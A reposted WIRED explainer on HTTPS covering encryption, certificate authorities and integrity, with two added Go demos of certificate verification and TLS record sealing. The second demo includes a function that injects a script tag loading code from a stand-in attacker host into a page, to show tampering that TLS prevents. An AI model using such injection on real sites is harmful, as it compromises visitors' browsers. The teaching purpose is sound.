Hacker Lexicon: What Is HTTPS?

Posted in Hacker Lexicon, Hacker News

FOR ALL THE attention that the iPhone’s encrypted storage and WhatsApp’s new end-to-end messaging encryption have gotten over the last few months, particularly from the US Justice Department, you’d think that encryption is just now hitting the mainstream. But in fact, you and billions of other people have been using a less loudly appreciated form of strong encryption for more than two decades: HTTPS.


HTTPS, or Hypertext Transfer Protocol with an S appended for “Secure,” is ordinary HTTP carried inside an encrypted TLS connection. It is what keeps your credit card data and passwords safe every time you enter them on a website that has even an ounce of security savvy. On a regular HTTP site, by contrast, that data can be intercepted, read and even altered by anyone on the path between you and the site’s server: a snoop on the same Starbucks Wi-Fi connection, the internet service provider, or the NSA.

When you visit a regular HTTP website, the web server responds to requests from your browser and simply hands over the website’s data in the clear. When you visit an HTTPS site, however, your browser and the server first perform a handshake: the server proves its identity with a certificate, and the two sides use public-key cryptography to agree on fresh session keys that no one listening in can derive. Those shared keys then encrypt and authenticate every message in both directions, so only the browser and the server can read the traffic, locking out all eavesdroppers.

“We all know the adage that the Internet is like a series of tubes,” says Peter Eckersley, a technologist with the Electronic Frontier Foundation, using former senator Ted Stevens’ much-mocked but actually-pretty-useful internet analogy. “If you use HTTP, those tubes are totally transparent. Anyone along the way can look inside and see exactly what you’re doing,” he says. Switch to HTTPS, on the other hand, and “those tubes become opaque. Only people at the end can see what’s traveling through them.”

Renewed Interest

HTTPS, which protects web traffic using an encryption protocol called SSL (and today its successor, TLS), has existed for more than two decades; it was first integrated into the web browser Netscape Navigator in 1994. But in just the last few years, it’s been undergoing a kind of accelerating renaissance: whereas HTTPS once was used almost exclusively to protect ecommerce and login pages, web administrators are increasingly rolling out encryption to other sorts of pages, from social media to government sites to news outlets. (Including the one you’re looking at. Stay tuned.)

Today, more than 42 percent of web visits are to pages that use HTTPS, up from less than 38 percent just last summer, by Mozilla’s count. And that increase is due to a growing recognition that HTTPS offers more than just security for your most sensitive personal information, says the EFF’s Eckersley. It also protects what he describes as “the right to read in private.” A visitor to Wikipedia might be learning about a medical condition they may suffer from. Someone searching Craigslist at their office could be looking for a new job. A student reading the Washington Post might be following transgender political issues. All of those activities, Eckersley argues, deserve to be protected from an internet provider, employer, or school administrator just as much as the person’s credit card number. (And fortunately, he points out, Craigslist, Wikipedia, and the Washington Post now all use HTTPS across their sites.)

Proof of Identity

In fact, HTTPS protects more than confidentiality. It also offers authentication and what website administrators call “integrity.” For a site to register in a browser as HTTPS encrypted, noted with a padlock in the browser’s address bar, it needs to authenticate itself: to prove that it’s the site it says it is, rather than an impostor. To do that, a website’s administrator asks a “certificate authority” company like Comodo or Symantec to issue the site a “certificate,” a digitally signed statement binding the site’s domain name to its public key. The browser ships with a list of authorities it trusts, and a certificate that doesn’t chain back to one of them, or that names a different domain, is rejected. In theory such a certificate can’t be forged, because only the authority holds the signing key. Certificate authorities have occasionally been hacked, as in the case of the Dutch firm DigiNotar in 2011, breaking that chain of trust. But in general, a certificate means that when your browser says you’re at https://google.com, you really are sharing your data with a Google server and no one else.
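The two mechanisms just described, the key-agreeing handshake from the opening section and the certificate check behind the padlock, as an added example written for this page in Go (it is not code from WIRED or from any company named in the article). It plays the roles of a trusted certificate authority, a rogue one, and a site called shop.example (a constructed name), shows that a browser-style check accepts only a certificate for the right host that chains to a trusted root, and then runs a real TLS handshake between a client and a server in memory. Key type, validity windows and the one-entry root store are all choices made for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

// Issued is a certificate together with the private key that belongs to it.
type Issued struct {
	Cert *x509.Certificate
	Key  *ecdsa.PrivateKey
	DER  []byte
}

// issue generates a fresh P-256 key pair and a certificate for tmpl. With a nil
// issuer the certificate signs itself (a root); otherwise the issuer's key signs it.
func issue(tmpl *x509.Certificate, issuer *Issued) (*Issued, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	parent, signer := tmpl, key
	if issuer != nil {
		parent, signer = issuer.Cert, issuer.Key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, err
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return nil, err
	}
	return &Issued{Cert: cert, Key: key, DER: der}, nil
}

// NewCA makes a self-signed root: the stand-in for a certificate authority.
func NewCA(name string) (*Issued, error) {
	return issue(&x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: name},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true,
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
	}, nil)
}

// NewLeaf makes a server certificate for host, signed by ca. Browsers match the
// host against the SAN list, so the name goes in DNSNames, not only the CN.
func NewLeaf(host string, ca *Issued) (*Issued, error) {
	return issue(&x509.Certificate{
		SerialNumber: big.NewInt(2), Subject: pkix.Name{CommonName: host}, DNSNames: []string{host},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour),
		KeyUsage:    x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}, ca)
}

// TrustOnly is a root store holding just ca: a browser's trust list cut to one entry.
func TrustOnly(ca *Issued) *x509.CertPool {
	pool := x509.NewCertPool()
	pool.AddCert(ca.Cert)
	return pool
}

// VerifyForHost is the check behind the padlock: the certificate must chain to
// a root in the store, be valid now, and be issued for the host being visited.
func VerifyForHost(cert *x509.Certificate, host string, roots *x509.CertPool) error {
	_, err := cert.Verify(x509.VerifyOptions{DNSName: host, Roots: roots})
	return err
}

// Handshake runs a real TLS handshake over an in-memory pipe. The server
// presents leaf; the client trusts only roots and expects host. It returns the
// negotiated version and cipher suite, or the client's verification error.
func Handshake(leaf *Issued, roots *x509.CertPool, host string) (string, error) {
	cliConn, srvConn := net.Pipe()
	defer cliConn.Close()
	srv := tls.Server(srvConn, &tls.Config{
		Certificates:           []tls.Certificate{{Certificate: [][]byte{leaf.DER}, PrivateKey: leaf.Key}},
		SessionTicketsDisabled: true, // the unbuffered pipe needs the server to send nothing the client will not read
	})
	go func() { _ = srv.Handshake(); srvConn.Close() }()
	cli := tls.Client(cliConn, &tls.Config{RootCAs: roots, ServerName: host, MinVersion: tls.VersionTLS12})
	if err := cli.Handshake(); err != nil {
		return "", err
	}
	cs := cli.ConnectionState()
	names := map[uint16]string{tls.VersionTLS12: "TLS 1.2", tls.VersionTLS13: "TLS 1.3"}
	return names[cs.Version] + " " + tls.CipherSuiteName(cs.CipherSuite), nil
}

func main() {
	ca, _ := NewCA("Trusted Root CA")
	rogue, _ := NewCA("Rogue CA") // an attacker's CA that no browser trusts
	leaf, _ := NewLeaf("shop.example", ca)
	forged, _ := NewLeaf("shop.example", rogue) // same name, wrong issuer
	roots := TrustOnly(ca)
	fmt.Println("genuine cert, right host:", VerifyForHost(leaf.Cert, "shop.example", roots))
	fmt.Println("forged cert:             ", VerifyForHost(forged.Cert, "shop.example", roots))
	fmt.Println("genuine cert, wrong host:", VerifyForHost(leaf.Cert, "evil.example", roots))
	fmt.Println(Handshake(leaf, roots, "shop.example"))
}
```

The forged certificate fails with an unknown-authority error and the genuine one presented for the wrong name fails with a hostname error; the TLS client runs exactly this x509 verification inside its handshake, which is why the example exercises the rejection cases through VerifyForHost and runs Handshake only for the genuine certificate. Running a rejecting handshake over net.Pipe can deadlock, because the client aborts with an alert while the server may still be writing its flight into an unbuffered pipe; use a loopback TCP listener for that experiment.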

As for “integrity,” HTTPS also prevents any interloper on the path between you and the server from tampering with or selectively blocking the contents of a site on its way to your browser. Without HTTPS, a government censor can choose to block certain pages of a site or even just parts of a page. More active tampering could allow an internet service provider to insert ads or hackers to inject code designed to compromise your computer. Last year the Chinese government even used a similar trick to add a script to the homepage of the Chinese search engine Baidu that triggered visitors’ browsers to request information from the Chinese version of the New York Times and the code repository GitHub, knocking both sites offline.
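What “integrity” means at the byte level, as an added example written for this page in Go (not WIRED’s code, and not a real TLS implementation): a small model of the TLS 1.3 record layer, AES-GCM under a fixed key and IV with a per-record nonce derived from the sequence number, run against a constructed HTTP response. In the clear, an on-path party can splice a script tag into the page and nobody notices; once the page is sealed, a targeted edit has nothing to find and a blind bit flip makes the receiver reject the record outright. The key and IV are drawn at random here where real TLS derives them from the handshake, and evil.example and x.js are invented names.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// SamplePage is a constructed HTTP response standing in for a site's home page.
var SamplePage = []byte("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" +
	"<html><body><h1>Welcome</h1></body></html>")

// Sealer models one direction of the TLS 1.3 record layer: AES-GCM under a
// fixed key and IV, with each record's nonce derived from its sequence number
// so that no two records are ever protected under the same nonce.
type Sealer struct {
	aead cipher.AEAD
	iv   []byte
	seq  uint64
}

func NewSealer(key, iv []byte) (*Sealer, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(iv) != aead.NonceSize() {
		return nil, errors.New("iv must be exactly one nonce long")
	}
	return &Sealer{aead: aead, iv: iv}, nil
}

// nonce XORs the big-endian sequence number into the low-order bytes of the IV
// and advances the counter, as RFC 8446 section 5.3 specifies.
func (s *Sealer) nonce() []byte {
	n := append([]byte(nil), s.iv...)
	var seq [8]byte
	binary.BigEndian.PutUint64(seq[:], s.seq)
	for i := range seq {
		n[len(n)-8+i] ^= seq[i]
	}
	s.seq++
	return n
}

// Header builds the 5-byte record header (application data, legacy version,
// length); it travels in the clear but is authenticated as additional data.
func (s *Sealer) Header(plaintextLen int) []byte {
	n := plaintextLen + s.aead.Overhead()
	return []byte{0x17, 0x03, 0x03, byte(n >> 8), byte(n)}
}

// Seal protects one record. Open is the receiver's side and fails closed if a
// single bit of the ciphertext, the tag or the header was changed in transit.
func (s *Sealer) Seal(header, plaintext []byte) []byte {
	return s.aead.Seal(nil, s.nonce(), plaintext, header)
}

func (s *Sealer) Open(header, record []byte) ([]byte, error) {
	return s.aead.Open(nil, s.nonce(), record, header)
}

// InjectScript is the targeted edit an on-path party can make to plaintext HTML.
func InjectScript(data []byte) []byte {
	hook := []byte(`<script src="http://evil.example/x.js"></script></body>`)
	return bytes.Replace(data, []byte("</body>"), hook, 1)
}

// FlipByte is the best a tamperer can do to ciphertext: change a byte blindly.
func FlipByte(data []byte) []byte {
	out := append([]byte(nil), data...)
	out[len(out)/2] ^= 0x01
	return out
}

// OverHTTP delivers the page in the clear: nothing stops or reveals the edit.
func OverHTTP(page []byte) []byte { return InjectScript(page) }

// OverTLS seals the page as one record, lets tamper act on the bytes on the
// wire (nil for an honest network), and returns what the receiver accepts.
func OverTLS(page []byte, tamper func([]byte) []byte) ([]byte, error) {
	key, iv := make([]byte, 16), make([]byte, 12) // real TLS derives these from the handshake
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	sender, err := NewSealer(key, iv)
	if err != nil {
		return nil, err
	}
	receiver, _ := NewSealer(key, iv)
	header := sender.Header(len(page))
	record := sender.Seal(header, page)
	if tamper != nil {
		record = tamper(record)
	}
	return receiver.Open(header, record)
}

func main() {
	fmt.Printf("HTTP, edited in transit:\n%s\n\n", OverHTTP(SamplePage))
	for name, tamper := range map[string]func([]byte) []byte{"no tampering": nil, "targeted edit": InjectScript, "bit flip": FlipByte} {
		got, err := OverTLS(SamplePage, tamper)
		fmt.Printf("TLS, %s: err=%v intact=%v\n", name, err, bytes.Equal(got, SamplePage))
	}
}
```

The receiver never sees a partially altered page: a GCM tag failure discards the whole record, which is also why a TLS connection tears down on the first corrupted record rather than passing suspect bytes up to the browser.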

Learning From Hacks

Attacks like those have raised awareness that HTTPS is important for more than privacy, says Josh Aas, a Mozilla engineer and the founder of the HTTPS-focused non-profit Let’s Encrypt, which has helped somewhere around 4 million sites turn on HTTPS in just the past six months. But he also points to more purposeful warnings about the danger of unencrypted HTTP sites. In 2010, a programmer named Eric Butler released a simple Firefox extension called Firesheep that let anyone on the same open Wi-Fi network capture the session cookies of other users’ unencrypted connections and take over their logged-in accounts, leading to a flurry of privacy concerns and prompting social media networks like Twitter and Facebook to extend encryption to their entire sites. Edward Snowden’s NSA leaks also made clear how much unencrypted data the NSA was siphoning en masse from the internet, renewing people’s interest in protecting their connections. “The problem just became much more clear over the past five or so years,” says Aas.

But even with a growing awareness of the importance of HTTPS, there is a lot of work to do. A report from Google just last month showed that 79 of the 100 most highly trafficked websites on the internet still do not yet use HTTPS encryption. And according to Mozilla, only 438,000 of the Alexa top 1 million sites offer HTTPS.

“Most users still don’t know about HTTPS, and even if they do, they don’t have any control over it. They have to either transmit their data in the clear or go somewhere else,” says Aas. “If we’re going to protect those people, we need to get websites to adopt HTTPS…It’s really a lynchpin in the internet’s security right now.”

Source: WIRED